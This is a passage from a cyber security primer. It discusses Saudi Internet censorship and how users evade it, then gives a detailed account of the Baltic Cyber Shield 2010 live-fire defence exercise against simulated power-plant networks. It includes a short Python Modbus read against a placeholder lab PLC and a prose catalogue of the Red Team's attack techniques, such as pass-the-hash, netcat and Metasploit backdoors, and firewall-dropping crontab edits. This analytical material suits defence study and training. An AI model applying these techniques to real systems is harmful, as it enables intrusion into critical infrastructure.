From Saudi Arabia, the blank emails were sent from webmail accounts such as Hotmail, whose secure, web application login 137 Advanced features include PICS labeling, MIME type, regular expressions, https, adverts, compressed HTML, intelligent algorithm matches for phrases in mixed HTML/whitespace, and phrase-weighting, which is intended to reduce over- and under-blocking. Furthermore, there is a whitelist mode and stealth mode, where access is granted to the user but an alert is nonetheless sent to administrators. 138 Lee, 2001. 139 Gardner, 2000. 140 “The Internet...” Human Rights Watch. 141 “Losing...” 2001. 142 Dobbs, 2001. 47 Cyber Security: A Technical Primer process made it impossible for KACST to see where the emails were going or what information they contained. MIRA’s head, Dr. Saad Fagih, said that following these changes, the number of Saudi visits to his site rose to 75,000 per day, and that before long KACST abandoned its efforts to block the site. 143 From a technical perspective, it is a challenge even to begin to censor the Internet. But to evaluate frequently changing websites for their moral and political content is a monumental task. Computer software can recognize individual words, but under- standing how they are used by an author in a given sentence or article is much more difficult. Words such as “breast” can be used to block sexual references to women, but the system may also block recipes for cooking chicken breasts. Likewise, it is difficult to avoid sexual references when offering medical advice related to sexually- transmitted diseases (STDs).144 Critics say that the decision to censor information at all leads to over-censorship.145 For example, in practice it is convenient to block an offensive website by IP ad- dress. However, this means that any other website sharing the same IP will also be blocked.146 An attacker can exploit this – and conduct a denial-of-service attack against a target website – simply by “poisoning” its webserver with prohibited mate- rial. Ideally, all censored information should be double-checked by real people to make sure that the system is working properly, but that may not always be practical or even possible. OpenNet Initiative researchers claim that blocked sites include material related to religion, health, education, humor, entertainment, general reference works, com- puter hacking, and political activism. But Saudi authorities argue that their system has safeguards against both over- and under-censorship. KACST provides forms for users to request additions to and removals from the blacklist, and they say hundreds of requests are received each day asking for new sites to be banned, of which about half are subsequently blacklisted. Thus, based on user feedback, around 7,000 sites a month are added to the list. Over 100 requests to unblock sites also arrive each day, many based on a belief that the system has mischaracterized certain web con- tent, but no statistics were offered regarding how many are unblocked.147 143 “Losing...” 2001. 144 “Government-Imposed...” 145 Whitaker, 2000. 146 “Government-Imposed...” 147 Lee, 2001. 48 BIRTH OF A CONCEPT: STRATEGIC CYBER SECURITY On balance, pornography is easier to censor than politics. Vulgar words can simply be removed from network traffic, but software cannot readily determine whether political keywords are used in a positive or negative way by an author. 
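The "breast" example comes down to bare substring matching, and a few lines of Python make the over-blocking concrete; the blocked term and test phrases are, of course, illustrative only.

```python
BLOCKED_TERMS = {"breast"}   # illustrative one-word blacklist

def is_blocked(text: str) -> bool:
    """Naive substring matching of the kind criticized above."""
    return any(term in text.lower() for term in BLOCKED_TERMS)

print(is_blocked("Grilled chicken breast with lemon"))    # True: a recipe is blocked
print(is_blocked("Breast cancer screening guidelines"))   # True: medical advice is blocked
```

Nothing in such a check can recover what the author actually meant.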
Furthermore, foreign computer technicians are also of little help since the author’s intention may have been positive feedback, constructive criticism, humor, irony, sarcasm, or satire. A proper evaluation requires subject matter experts who are fluent in the local lan- guage, a naturally expensive and time-consuming undertaking. The problem for censors is that users who are intent on obtaining forbidden in- formation often find a way to get it. And Saudi citizens are no different. Some ac- cess the Internet simply by finding computer terminals they assume are not being monitored.148 Others make expensive telephone calls to unrestricted foreign ISPs.149 Increasingly, Saudi citizens have acquired direct-to-satellite Internet access, with dishes small enough to fit discreetly on a balcony or rooftop.150 Blocked websites “mirror” their content on known accessible sites, or users forward the forbidden content by email as an attached file.151 There are many ways to send email that offer an increased level of security, and all of them have been used in Saudi Arabia. Many webmail services are free and do not require users to register with a real name.152 “Remail” services attempt to remove all identifying user information, try not to keep log files of their activity, and route their encrypted email through other remailers before reaching its destination. A govern- ment censor typically only knows that a user has visited a remailer site, but cannot obtain a copy of the message or know its recipient.153 Cutting edge peer-to-peer networking presents another major challenge to Internet censors. It employs virtual private networking (VPN) technology in an attempt to make file-sharing between computer users invisible to firewalls and content-filtering systems such as that used in Saudi Arabia.154 Saudi Web surfers have often made use of anonymous proxy servers,155 which make web requests on a user’s behalf, by substituting their own IP for that of the user. Unwanted tracking software, such as a browser “cookie,” is also disabled in the pro- 148 “How Users...” Human Rights Watch. 149 Whitaker, 2000. 150 “How Users...” Human Rights Watch. 151 ““The Internet...” Human Rights Watch. 152 “How Users...” Human Rights Watch. 153 “How Users...” Human Rights Watch. 154 Lee, 2001. 155 Dobbs, 2001. 49 Cyber Security: A Technical Primer cess. APS IPs are of course blocked by KACST,156 but such services try to make such blocking as difficult as possible.157 Today, strong encryption, such as Pretty Good Privacy (PGP), is both reliable and cheap. PGP’s design, which couples a sophisticated encryption algorithm with a se- cret passphrase, works so well that it has come to play an important role in provid- ing privacy to individual web users around the world. As a result, many countries, including Saudi Arabia, disallow its use.158 Information on computer hacking, which can give ordinary citizens an upper hand in figuring out how to beat censorship, is often banned.159 But no specific tools can be recommended because none of them is perfect.160 New software tools are frequently released, some of which are specifically designed to support anti-censorship movements. Psiphon, for example, is easy to use and difficult for governments to discover. It works like this: a computer user in an un- censored country installs Psiphon on his or her computer and then allows a user in a censored country to open an encrypted connection through their computer to the Internet. 
Connection information, including a username and password, is passed by telephone, posted mail, or human contact. In summary, network communications are highly vulnerable to surveillance, espe- cially when all traffic flows through one state-owned system. The Saudi national firewall has been successful in keeping ordinary users from visiting many anti- Muslim or anti-Saudi websites. However, it is extremely difficult for any govern- ment to prevent those who are willing to accept the risk of arrest from conducting prohibited activities. In the long run, large-scale Internet control may be doomed to failure. Censorship tends to inhibit economic development, and governments are often simply too far behind the technology curve. New websites appear every minute, and any one of them – or all of them – are potentially hostile. Saudi officials publicly acknowledge that it is hard to keep up.161 This chapter sought to demonstrate that managing Internet security is highly prob- lematic, even for a willing and well-resourced government. But from a strategic secu- rity perspective, there are concerns that lie above and beyond political criticism and 156 “SafeWeb...” 2000. 157 “SafeWeb...” 2000. 158 “How Users...” Human Rights Watch. 159 Gavi, 1999 and 2002. 160 “How Users...” Human Rights Watch. 161 Gardner, 2000. 50 BIRTH OF A CONCEPT: STRATEGIC CYBER SECURITY pornography: to wit, the protection of national critical infrastructures. Are they safe from cyber attack? This is the topic of the next chapter, which examines a hypotheti- cal cyber terrorist attack against an electricity plant. Modeling Cyber Attack and Defense in a Laboratory Many national security thinkers fear that the age of cyber terrorism and cyber war- fare is coming soon. And the target list seems to grow by the day: electricity,162 water, air traffic control, stock exchange,163 national elections,164 and more. However, the extent to which cyber attacks pose a true threat to national security is unclear. Expert opinions range from dismissive165 to apocalyptic.166 We do know that there are worrisome trends in information technology (IT). Nation- al critical infrastructures are increasingly connected to the Internet. At the same time, their custom IT systems, some created in the 1950s and 1960s, are now being replaced with less expensive, off-the-shelf and Internet-enabled Windows and UNIX systems that are not only easier to use but easier to hack. The older systems were relatively more secure because they were not well-understood by outsiders and be- cause they had minimal network contact with other computer systems.167 National security planners require a better understanding of the threat posed by cy- ber attacks as soon as possible. Some real-world case studies exist.168 However, much information lies outside the public domain. Furthermore, there have been no wars yet between two Internet-enabled militaries, and the ignorance of many organiza- tions regarding the state of their own cyber security is alarming. Looking toward the future, military planners must be able to simulate cyber attacks and test cyber 162 “Remarks by the President...” 2009; “Cyber War...” 2009: The threat to electricity encompasses everything that relies on electricity to function, including computer systems. In May 2009, President Obama stated that “cyber attacks have plunged entire cities into darkness,” reportedly referencing large scale, anonymous attacks in Brazil. 
163 Wagner, 2010: In May 2010, after the Dow Jones surprisingly plunged almost 1,000 points, White House adviser John Brennan stated that officials had considered but found no evidence of a malicious cyber attack. 164 Orr, 2007: In 2007, California held a hearing for election officials on the subject of whether hackers could subvert the integrity of the state’s touch-screen voting machines. While the system manufacturer disputed the validity of the tests, the Red Team leader testified that the voting system was vulnerable to numerous attacks that could be carried out quickly. 165 Persuasive cyber war skeptics include Cambridge University Professor Ross Anderson, Wired “Threat Level” Editor Kevin Poulsen, and Foreign Policy editor Evgeny Morozov. 166 Bliss, 2010: In early 2010, former U.S. Director of National Intelligence Michael McConnell testified that the U.S. would “lose” a cyber war today, and that it will probably take a “catastrophic event” before needed security measures are undertaken to secure the Internet. 167 Preimesberger, 2006. 168 Geers, 2008: This author has highlighted the cases of Chechnya, Kosovo, Israel, China, and Estonia. 51 Cyber Security: A Technical Primer defenses within the bounds of a safe laboratory environment, without threatening the integrity of operational networks.169 The need for cyber defense exercises (CDX) is clear. But the complex and ever- changing nature of IT and computer hacking makes conducting a realistic CDX an enormous challenge and may render its conclusions valid only for a short period of time. The world is experiencing a rapid proliferation of computing devices, process- ing power, user-friendly hacker tools, practical encryption, and Web-enabled intel- ligence collection.170 At the same time, a CDX requires the simulation of not only adversary and friendly forces, but even the battlefield itself. Of course, the military is no stranger to computers. Software is now used to train tank drivers and pilots; it is also used to simulate battles, campaigns, and even com- plex geopolitical scenarios. But it remains controversial how closely a computer sim- ulation can model the complexity of the real world. Myriad factors can contribute to failure – poor intelligence, incorrect assumptions, miscalculations, a flawed scoring system, and even political considerations. In 2002, the U.S. military spent $250 million on a war game called Millennium Challenge, which was designed to model an invasion of Iraq. In the middle of the exercise, the Red Team (RT) leader, Marine Corps Lt. Gen. Paul Van Riper, quit the game on the grounds that it had been rigged to ensure a Blue Team (BT) victory.171 This chapter covers the origin and evolution of CDXs, and it describes the design, goals, and lessons learned from a recent “live-fire” international CDX, the May 2010 Baltic Cyber Shield (BCS). BCS was managed at the Cooperative Cyber Defence Cen- tre of Excellence (CCD CoE) in Tallinn, Estonia. Its virtual battlefield was designed and hosted by the Swedish Defence Research Agency (FOI) in Linköping, Sweden with the support of the Swedish National Defence College (SNDC).172 Over 100 par- ticipants hailed from across northern Europe. A robust CDX requires a team-oriented approach. There are friendly forces (Blue), hostile forces (Red), technical infrastructure (Green), and game management (White). The RT and BTs are the CDX combatants. The Green Team (GT) and White Team (WT) are non-combatants; RT attacks against either in most CDXs are strictly prohibited. 
169 Occasionally, “penetration tests” are conducted against operational networks, but extreme care is always taken to avoid a real-life denial-of-service and/or the loss of sensitive data. 170 In the Internet age, Open Source Intelligence (OSINT) collection, against both people and organizations, is easier and more powerful than ever. 171 Gomes, 2003. 172 Estonian Cyber Defence League, Finnish Clarified Networks, NATO Computer Incident Response Capability-Technical Centre (NCIRC-TC), Swedish Civil Contingencies Agency (MSB) and National Defence Radio Establishment (FRA) also participated in the CDX. 52 BIRTH OF A CONCEPT: STRATEGIC CYBER SECURITY BT personnel are normally real-life system administrators and computer security specialists. Their goal is to defend the confidentiality, integrity, and availability (CIA) of their computer networks against hostile RT attacks. In BCS 2010, the BTs were the primary targets for instruction; their progress was tracked by automated and manual scoring systems. The RT plays the role of a cyber attacker, or in this CDX, a “cyber terrorist.” The RT attempts to undermine the CIA of BT networks, using a variety of hacker tools and tactics.173 In a “white box” test, RTs may be given detailed, prior knowledge of the BT networks; a “black box” test requires the RT to gather this information on its own.174 Either way, RTs – just like real-life hackers – have an enormous advantage over their BT counterparts because they can often methodically work their way through vari- ous cyber attacks until they succeed in hacking the network.175 The WT manages and referees the CDX. Normally, it writes the game’s scenario, rules, and scoring system. The WT will make in-game adjustments in an effort to en- sure that all participants are gainfully employed throughout the CDX. It also seeks to prevent cheating. For example, if a particular firewall rule appeared to be detri- mental to the game and/or unrealistic in real-life, the WT may disallow it. Finally, the WT often declares a CDX “winner.” The GT is responsible for designing and hosting the CDX network infrastructure. It is the in-game “Internet Service Provider” (ISP). To allow for post-game analysis, the GT should attempt to record all CDX network traffic. With the aid of virtual machine technology, it is technically possible to carry out a CDX on a handful of computers. However, to simulate a powerful adversary, significant resources are required, and a time- and labor-intensive CDX is unavoidable. (The RT, for example, should have a plan that indicates the availability of significant money and manpower.) With Virtu- al Private Network (VPN) technology, the RT, BTs, and WT can be located anywhere in the world and remotely connect to the CDX environment. All automatic scoring in the CDX is implemented by the GT. Cyber warfare is very different from traditional warfare. Tactical victories amount to a reshuffling of the electronic bits of data – also known as ones and zeros – inside 173 Preimesberger, 2006: In the U.S., Sandia National Laboratories have developed eight “natural categories” of Red Teaming: design assurance, hypothesis testing, benchmarking, behavioral Red Teaming, gaming, operational Red Teaming, penetration testing, and analytic Red Teaming. 174 A black box is often considered more realistic because real-world hackers normally find themselves in this position. However, given strict time limits, white box CDXs are the norm. 
In BCS 2010, the RT had access to the initial BT network for three weeks prior to the CDX. 175 Geers, 2010: In a CDX, this depends in part on the complexity of the network the BTs have to defend and the amount of time the RT has to attack it. In the real world, hackers can often remain anonymous in cyberspace, so deterring cyber attacks is difficult. Attackers may be able to keep trying to crack a network until they succeed, and there is normally no penalty for the failed attempts. 53 Cyber Security: A Technical Primer a computer. At that point, an attacker must wait to see if any intended real-world ef- fects actually occur. A cyber attack is best understood not as an end in itself, but as an extraordinary means to a wide variety of ends: espionage,176 denial of service,177 identity theft,178 propaganda,179 and even the destruction of critical infrastructure.180 The primary goal of a CDX is to credibly simulate the attack and defense of a com- puter network. At the tactical level, the RT has the same goals as any real-world hacker – to gain unauthorized access to the target network.181 If “administrator” or “root” access is obtained, the intruder may be able to install malicious software and erase incriminating evidence at will. Further actions, possibly aimed to support some political or military goal, could range in impact from a minor annoyance to a national security crisis. The CDX “scenario” is helpful in determining the overall strategic significance of an exercise. A well-written scenario should estimate the required resources and pro- jected cost of a theoretical attack. This in turn helps national security planners to determine whether a person, group, or nation could attempt it. For example, it still remains difficult to imagine a lone hacker posing a threat to a nation-state.182 How- ever, future cyber attacks might change that perception. It is almost impossible for a limited-duration CDX to simulate the threat posed by a nation-state. Military and intelligence agencies are “full-scope” actors that do not rely solely on computer hacking to achieve an important objective. Governments draw from a deep well of expertise in many IT disciplines, including cryptogra- 176 “Tracking GhostNet...,” 2009: The most famous case to date is “GhostNet,” investigated by Information Warfare Monitor, in which a cyber espionage network of over 1,000 compromised computers in 103 countries targeted diplomatic, political, economic, and military information. 177 Keizer, 2009: During a time of domestic political crisis, hackers were able to make matters worse by knocking the entire nation-state of Kyrgyzstan offline. 178 Gorman, 2009b: American identities and software were reportedly used to attack Georgian government websites during its 2008 war with Russia. 179 Goble, 1999: Since the earliest days of the Web, Chechen guerilla fighters have demonstrated the power of Internet-enabled propaganda. “‘USA Today’ Website Hacked...” 2002: On a lighter note, a hacker placed a series of fake articles on the USA Today website. One read, “Today, George W. Bush has proposed ... a Cabinet Minister for Propoganda and Popular Englightenment [sic].... If approved, Bush would appoint Dr. Joseph Goebbels to the post.” 180 Meserve, 2007: Department of Homeland Security (DHS) officials briefed CNN that Idaho National Laboratory (INL) researchers had hacked into a replica of a power plant’s control system and changed the operating cycle of a generator, causing it to self-destruct. 
181 There are exceptions, such as a denial-of-service attack in which the main goal is to overload the system with superfluous data. 182 Verton, 2002: Nonetheless, it is astonishing what some lone hackers have been able to accomplish. In 2001, “MafiaBoy,” a 15 year-old from Montreal, was able to deny Internet service to some of the world’s biggest online companies, causing an estimated $1.7 billion in damage. 54 BIRTH OF A CONCEPT: STRATEGIC CYBER SECURITY phy, programming, debugging, vulnerability discovery, agent-based systems, etc.183 Those skill sets are in turn supported by experts in the natural sciences, physical security, supply chain operations, continuity of business, social engineering,184 and many more. The Sandia National Laboratories RT, based in New Mexico, provides a robust model. Sandia has a long track record of successfully hacking its clients, which include military installations, oil companies, banks, electric utilities, and e-commerce firms. Its RT takes pride in finding hidden vulnerabilities in complex environments,185 in- cluding obscure infrastructure interdependencies in highly specialized domains.186 A former Sandia RT leader put it best: “Our general method is to ask system owners: ‘What’s your worst nightmare?’ and then we set about to make that happen.”187 Every CDX is unique. There are simply too many variables in cyberspace, and IT con- tinues to evolve at an astonishing rate. Some CDXs are conducted only in a labora- tory, while others take place on real networks in the real world. For the latter, cyber defenders may be warned about the CDX before it starts, or the RT attack may come as a complete surprise. In 1997, an RT of thirty-five U.S. National Security Agency (NSA) personnel, playing the role of North Korean hackers, targeted the U.S. Pacific Command from cyber- space. The CDX, code-named Eligible Receiver, was an enormous success. James Adams wrote in Foreign Affairs that the RT was able to infect the “human com- mand-and-control system” with a “paralyzing level of mistrust,” and that “nobody in the chain of command, from the president on down, could believe anything.”188 Furthermore, Eligible Receiver was credited with revealing that a wide variety of national critical infrastructures was equally vulnerable to common hacker tools and techniques.189 Many CDXs involve a proof-of-concept. In 2006, the U.S. Environmental Protection Agency asked the Sandia RT to conduct a vulnerability assessment of every water 183 Lam et al, 2003. 184 Lawlor, 2004: Social engineering takes advantage of human weaknesses in security. Experience shows that malicious or co-opted insiders, due to the physical access they have to IT systems, can do more damage to an organization than a malicious outsider. This type of attack can be surprisingly easy to conduct against a large organization, where one does not personally know everyone in the organization. 185 For example, the production of energy – as well as the ability to attack an energy plant – can require a knowledge of systems and computer languages that is truly unique to that environment. 186 Lawlor, 2004. 187 Gibbs, 2000. 188 Adams, 2001. 189 Verton, 2003. 55 Cyber Security: A Technical Primer distribution plant serving at least 100,000 people. The fear was that a malicious hacker might be able to change the chemical composition of water enough to poison it. 
When the RT discovered that there were 350 such facilities in the country – far too many to examine each one – Sandia decided to conduct a thorough analysis of five sites and then construct the Risk Assessment Methodology for Water (RAM-W), which could then be used for self-assessment.190 Today, an important trend in CDXs is to encompass international partners. Because the architecture of the Internet is international in scope, Internet security is by defi- nition an international responsibility. In 2006, the U.S. Department of Homeland Security (DHS) began a bi-annual, inter- national CDX called Cyber Storm. This event specifically seeks to assess how well government agencies and the private sector can work together to thwart a cyber attack.191 The 2006 scenario simulated an attack by non-state, politically-motivated “hacktivists.”192 The 2008 Cyber Storm II193 simulated a nation-state actor that con- ducted both cyber and physical attacks on communications, chemical, railroad, and pipeline infrastructure.194 In 2010, Cyber Storm III added the compromise of trusted Internet transactions and relationships and included cyber attacks that led to the loss of life. The testing of cyber defenses is not confined to the First World. In 2009, the U.S. sponsored an international CDX in remote and mountainous Tajikistan, which in- cluded participants from Kazakhstan, Kyrgyzstan and Afghanistan.195 Baltic Cyber Shield (BCS), held on May 10-11, 2010 in numerous countries across northern Europe, was a “live-fire” CDX. A twenty-person international RT and six national BTs took part in an unscripted battle in which the use of malicious code – within the confines of a virtual battlefield196 – was both authorized and encouraged. 190 Preimesberger, 2006. 191 Verton, 2003: Market forces, deregulation, and outsourcing mean that myriad important computer networks and critical infrastructures now lie in private hands. This, combined with the reluctance of many businesses to disclose cyber attacks for fear of embarrassment, make it difficult for government to help protect the private sector. 192 Chan, 2006. 193 This CDX included eighteen federal agencies, nine U.S. states, three dozen private companies, and four foreign governments: Australia, Canada, New Zealand, and the UK. These were the same countries that took part in 2006. It is worth noting that these governments are members of a joint 1947 intelligence-sharing accord that makes it possible for them to share classified information. 194 Waterman, 2008: The RT also targeted the media in an effort to undermine public trust in government. 195 “International cyber exercise...” 2009. 196 The entire CDX took place within the bounds of a safe laboratory environment. 56 BIRTH OF A CONCEPT: STRATEGIC CYBER SECURITY BCS 2010 was similar in nature to the annual CDXs that pit U.S. military services against one another197 and for which the Pentagon now sponsors a national com- petition at the high school level.198 Other CDXs that inspired aspects of BCS 2010 included the Pentagon’s International Cyber Defense Workshop (ICDW), the UCSB International Capture the Flag (iCTF), and the U.S. National Collegiate Cyber Defense Competition. The game scenario described a volatile geopolitical environment in which a hired- gun, Rapid Response Team of network security personnel defended the computer networks of a power supply company against increasingly sophisticated cyber at- tacks sponsored by a non-state, terrorist group.199 BCS 2010 had three primary goals. 
First, the BTs should receive hands-on experi- ence in defending computer networks containing Critical Information Infrastructure (CII) and elements of Supervisory Command and Data Acquisition (SCADA).200 Sec- ond, the CDX scenario sought to highlight the international nature of cyberspace, to include the political, institutional, and legal obstacles to improved cyber defense cooperation. Third, participating teams were meant to gain a better understanding of how to conduct CDXs in the future. The WT was based primarily at SNDC in Stockholm, Sweden, with a smaller con- tingent at CCD CoE in Tallinn, Estonia. The WT’s scoring criteria were designed to gauge the BTs’ ability to maintain the CIA of their virtual networks, including office infrastructure and external services.201 In the event of compromise, the number of points lost depended on the criticality of the system, service, or penetration. For example, if the RT gained Admin/Root-level access to a computer or compromised a SCADA Programmable Logic Controller (PLC), the BT was significantly penalized. On the other hand, BTs won positive points for thwarted attacks, for successfully 197 Caterinicchia, 2003. 198 Defense & Aerospace, 2010: In March 2010, “Team Doolittle” from Clearfield High School in Utah won the CyberPatriot II Championships, sponsored by the U.S. Air Force Air Warfare Symposium in Orlando, Florida. 199 Lewis, 2010: James Lewis of CSIS recently stated: “It remains intriguing and suggestive that [terrorists] have not launched a cyber attack. This may reflect a lack of capability, a decision that cyber weapons do not produce the violent results terrorists crave, or a preoccupation with other activities. Eventually terrorists will use cyber attacks, as they become easier to launch...” 200 SCADA systems can be used to support the management of national critical infrastructures such as the provision of electricity, water, natural gas and manufacturing. The disruption or other misuse of such systems could potentially become a national security issue. 201 Both automated and manual means were used to verify CIA. The latter, for example, could entail the WT simulating the actions of ordinary users. They may periodically request a BT webpage to see that it is reachable and not defaced. 57 Cyber Security: A Technical Primer completing in-game “business requests,”202 and for the implementation of innovative cyber defense strategies and tactics. The six BTs consisted of 6-10 personnel each, and hailed from various northern European governments, military, private sector, and academic institutions. All were provided an identical, pre-built, and somewhat insecure computer network com- posed of 20 physical PC servers running a total of 28 virtual machines.203 These were further divided into four VLAN segments – DMZ, INTERNAL, HMI,204 and PLC. The BT networks were further connected to various in-game servers that provided additional business functionality to their fictitious users. The BCS 2010 scenario called for the inclusion of SCADA software in order to simu- late a power generation company’s production, management, and distribution capa- bilities. These comprised GE PLCs, Simplicity HMI terminals, Historian databases, and two physically-separated model factories per BT network. Because of the “rapid response” nature of the BCS 2010 scenario, the BTs were given access to the CDX environment – including somewhat outdated network documenta- tion – only on day one of the CDX. 
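For readers unfamiliar with SCADA traffic, the link between an HMI workstation and a PLC of the kind fielded in BCS 2010 typically carries very simple request/response protocols such as Modbus/TCP. The Python sketch below issues a single "read holding registers" request; the controller address, register range, and the assumption of a lab PLC or simulator listening on the standard port 502 are placeholders, not details of the BCS 2010 environment.

```python
import socket
import struct

PLC_HOST = "192.0.2.50"   # placeholder address of a lab PLC or simulator
PLC_PORT = 502            # standard Modbus/TCP port

def read_holding_registers(start: int, count: int) -> bytes:
    """Send one Modbus/TCP 'read holding registers' request and return the raw reply."""
    transaction_id, protocol_id, unit_id, function_code = 1, 0, 1, 3
    # MBAP header (transaction id, protocol id, remaining byte count, unit id)
    # followed by the PDU (function code, starting address, register count).
    request = struct.pack(">HHHBBHH",
                          transaction_id, protocol_id, 6, unit_id,
                          function_code, start, count)
    with socket.create_connection((PLC_HOST, PLC_PORT), timeout=2) as sock:
        sock.sendall(request)
        return sock.recv(256)

# e.g. poll the first ten registers of a model factory's controller:
# print(read_holding_registers(0, 10).hex())
```

Protocols this bare, with no built-in authentication, are part of what makes SCADA segments such attractive targets.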
They were allowed to harden their networks,205 but a minimum number and type of applications and services had to be maintained.206 The BTs were allowed to install new software and/or modify existing software. How- ever, offensive BT cyber attacks, either against the RT or against other BTs, were strictly prohibited.207 202 This aspect of the game was intended to raise the stress level of BT participants. It simulated the real- world challenge of handling both security threats and ordinary business processes at the same time. For example, a CEO may call while on a business trip, needing immediate remote access, and the BT must provide a timely solution. Alternatively, a BT member might become “ill” and have to spend one hour on “sick leave” in a break room. 203 The BTs accessed the game environment by VMWare Console from a browser or over SMB, RPC, SSH, VNC, or RDP. The power company’s network included both Windows and Linux operating systems. Unfortunately, the Console access of the free version of VMWare Server proved to be too slow and unstable for such a large event. 204 Human Machine Interface: these workstations ran the control software for the PLCs, providing the communication link between the Supervisor node and the remote factories. 205 In the real world too, new IT hires cannot assume that legacy systems are secure or even properly installed. They are likely to find some vulnerable, unpatched, redundant, etc systems. Further, existing documentation may be dated or incomplete. Once given access to the infrastructure, the BTs were allowed to disable, patch, and/or replace applications and services as long as the final configuration met CDX parameters. 206 These included HTTP, HTTPS, SMTP, DNS, FTP, IMAP/POP3, SSH, and NTP. 207 As a starting point, the BTs must stay within their countries’ legal frameworks. 58 BIRTH OF A CONCEPT: STRATEGIC CYBER SECURITY The BCS RT consisted of twenty volunteers208 from throughout northern Europe.209 The RT was given access to the game environment two weeks prior to the CDX in order to simulate a degree of prior reconnaissance. To maximize the CDX’s value to all participants, the WT directed the RT to begin its attacks slowly, and to pro- gressively increase the scale and sophistication of its attacks throughout the game. Beyond that, there was no limit on the type of hacker tools and techniques that the RT could use.210 However, the RT was strictly prohibited from attacking the CDX infrastructure,211 and all attacks were confined to the virtual game environment. In- ternally, the RT divided itself into four sub-teams, depending on the hackers’ attack specialization: “client-side,” “fuzzing,” “web app,” and “remote.” The GT, based at the Swedish Defence Research Agency (FOI) in Linköping, Sweden, hosted most of the BCS 2010 infrastructure. The BT networks were designed col- laboratively by the GT and the WT. The FOI laboratory consisted of nine racks, with twenty physical servers in each rack.212 The game infrastructure included twelve, twenty centimeter tall physical models of factories, each with its own PLC, SCADA software, and “Ice Fountain” fireworks that the RT could turn on as “proof” of a suc- cessful attack. The GT provided the RT and BTs access to the game environment via OpenVPN. 
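As noted in the scoring discussion above, part of the verification was automated, with scored services periodically checked for reachability and defacement. A minimal probe of that kind might look like the following Python sketch; the URL is a placeholder, and a real scoring engine would track every scored service for every team, tolerate legitimate page changes, and write results to the scoreboard rather than printing them.

```python
import hashlib
import urllib.request

TARGET_URL = "http://blue1.game.example/index.html"   # placeholder scored BT page

def fetch_digest(url: str) -> str:
    with urllib.request.urlopen(url, timeout=5) as resp:
        return hashlib.sha256(resp.read()).hexdigest()

def probe(url: str, baseline_digest: str) -> dict:
    """Check that a scored page is reachable and unchanged since the baseline."""
    try:
        digest = fetch_digest(url)
    except OSError:
        return {"reachable": False, "defaced": None}   # availability points lost
    return {"reachable": True, "defaced": digest != baseline_digest}

# Record a known-good baseline once, then re-check on a timer:
# baseline = fetch_digest(TARGET_URL)
# print(probe(TARGET_URL, baseline))
```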
Finally, the WT had access to a robust visualization environment213 that displayed all network topography, network traffic flows, observer reports, chat channels, team workspaces, scoreboard, and a terrestrial map of the CDX environment.214 BCS 2010 formally began when the BTs and the RT logged into the CDX environ- ment. But the most anticipated moment arrived when the RT began its cyber attack on the BT networks. 208 The BCS 2010 RT was mostly volunteer-based. However, it is worth noting that one contractor bid to provide an RT came in at $500,000. 209 The Estonian Cyber Defence League built and managed the RT. 210 However, it is helpful if many easily-accessible, Internet-available attack tools are used, because the BTs will see these often in the real world. 211 Including the game scoring system J. 212 The servers had 2 Xeon 2.2 GHz processors, 2 GB RAM, 80 GB HDD, VMware Server 2.0.2 on Gentoo Linux, 2x Ethernet interfaces, and 2 switches, one for management and one for the game network. 213 This was provided by the Finnish company Clarified Networks. 214 In the BCS 2010 scenario, two BTs were theoretically based in South America, two in Africa, and two in Asia; the RT was in Iceland (in reality, all teams were located in northern European countries). 59 Cyber Security: A Technical Primer The RT campaign was divided into four phases: • Declaration of war • Breaching the castle wall • Owning the infrastructure • Wanton destruction The first objective, declaration of war, required the RT to “deface” the six BT public websites and to give each power company an ultimatum. In a posted statement, the “cyber warfare division” of an extremist environmental organization called “K3” demanded that the power company publicly announce its intention to convert to alternative, greener power ... or face a crippling cyber attack. The RT succeeded in defacing five of the six sites within 30 minutes. During phase one, the RT was allowed to compromise only one server in each BT DMZ and only one internal workstation in each BT network. Even with these con- straints, however, the RT succeeded in creating such a steady stream of incident reports that the WT had trouble translating all of them into negative points for the BTs. For example, within an hour the RT had established a live audio and video connection into one BT network; in other words, the game had barely begun and a digital spy was already working inside one of the power companies. In the past, a major challenge inherent in CDXs is that it has been difficult for the RT to maintain balanced and sustained pressure on all BTs throughout the game. At dif- ferent stages in a CDX, some BTs could be quite busy, while others had nothing to do. To help avoid this, the WT instructed the RT that, for each vulnerability discovered on a BT network, the RT must systematically check all other BT systems for the same vulnerability and exploit it if possible. Phase two of the K3 attack campaign called for the RT to compromise as many DMZ215 systems as possible. At the end of day one, the RT had successfully attacked 42 computers, including web and email servers. The RT leader was more than pleased with his team’s progress. Phase three called for the RT to steal the BT networks’ “crown jewels.” In BCS 2010, these were the internal network computers that served as the HMI for power gen- eration and management, i.e., its SCADA infrastructure. Although the RT was quite successful in the CDX overall, it claimed only limited victories in phase three. 
Of the 215 The DMZ, or demilitarized zone, is a physical or logical subnetwork that is exposed to untrusted networks, such as the Internet. 60 BIRTH OF A CONCEPT: STRATEGIC CYBER SECURITY twelve model factories, the RT succeeded in setting only one of them on fire, and it is still unclear whether this RT success was intentional or accidental.216 The fourth and final phase of BCS 2010, “wanton destruction,” allowed the RT to attack and destroy any BT system in the CDX. The goal was to simulate a desperate attempt by K3 to cause maximum disruption to the power companies’ operations. Unfortunately, RT successes in this phase often denied service to the same comput- ers it had previously compromised, and it prevented the WT from scoring the game properly. In other words, a poorly-designed DoS attack can bring down large sec- tions of network infrastructure and nearly ruin the game. In this CDX, for example, the RT used a custom-configured Cisco router to simulate traffic; at one point, it created such a high volume of data that the RT denied itself access to the gamenet for 15 minutes. The RT successfully attacked several publicly-known vulnerabilities during BCS 2010, including MS03-026, MS08-067, MS10-025, and flaws in VNC, Icecast, Cla- mAV, and SQUID3. It hacked web applications such as Joomla and Wordpress and also employed SQL injection, local and remote file inclusion, path traversal, and cross-site scripting against Linux, Apache, Mysql, and PHP. Other tactics included account cracking, online brute-forcing, DoS with fuzzing tools, obtaining password hashdumps of compromised systems, and using the “pass-the-hash” technique to hack into more machines. The RT installed Poison Ivy, netcat, and custom made code as backdoors. Metasploit was used to deploy reverse backdoors. The RT modi- fied compromised systems in various ways, such as altering the victim’s crontab file to continuously drop firewall rules. Last but not least, the RT possessed a zero-day client-side exploit for virtually every browser in existence today. Although the BCS 2010 scoring system applied only to the BTs, when the game was over, the RT leader smiled as if his team had won the game. When the CDX ended, there were over 80 BT computers that were confirmed compromised. However, the BTs did adopt some successful defensive strategies. The most success- ful BT – which was also declared the winner of BCS 2010 – quickly moved essential network services, such as NTP, DNS, SMTP and WebMail, to its own custom-built, higher-security virtual machine. IPsec filtering rules were used for communications with the Domain Controller. This BT had also requested the use of an “out-of-band” communication channel for its 